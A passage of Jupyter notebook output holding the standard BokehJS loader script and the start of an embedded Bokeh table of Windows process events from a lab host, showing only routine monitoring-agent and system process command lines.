(root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n var NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n var el = document.getElementById(null);\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n if (url in hashes) {\n element.crossOrigin = \"anonymous\";\n element.integrity = \"sha384-\" + hashes[url];\n }\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n var css_urls = [];\n \n\n var inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (var i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n var cell = $(document.getElementById(null)).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n var docs_json = {\"9f99a709-de57-4c7f-80e9-30ace23bde13\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"auto_edit\":true,\"columns\":[{\"id\":\"1610\"},{\"id\":\"1611\"},{\"id\":\"1617\"},{\"id\":\"1612\"},{\"id\":\"1613\"},{\"id\":\"1614\"},{\"id\":\"1615\"}],\"editable\":true,\"height\":160,\"source\":{\"id\":\"1586\"},\"view\":{\"id\":\"1620\"},\"width_policy\":\"max\"},\"id\":\"1608\",\"type\":\"DataTable\"},{\"attributes\":{},\"id\":\"1689\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1701\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1694\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1699\",\"type\":\"StringFormatter\"},{\"attributes\":{},\"id\":\"1697\",\"type\":\"StringFormatter\"},{\"attributes\":{\"editor\":{\"id\":\"1698\"},\"field\":\"NewProcessName\",\"formatter\":{\"id\":\"1697\"},\"title\":\"NewProcessName\",\"width\":52},\"id\":\"1613\",\"type\":\"TableColumn\"},{\"attributes\":{},\"id\":\"1693\",\"type\":\"StringEditor\"},{\"attributes\":{},\"id\":\"1691\",\"type\":\"StringEditor\"},{\"attributes\":{\"data\":{\"Account\":[\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo 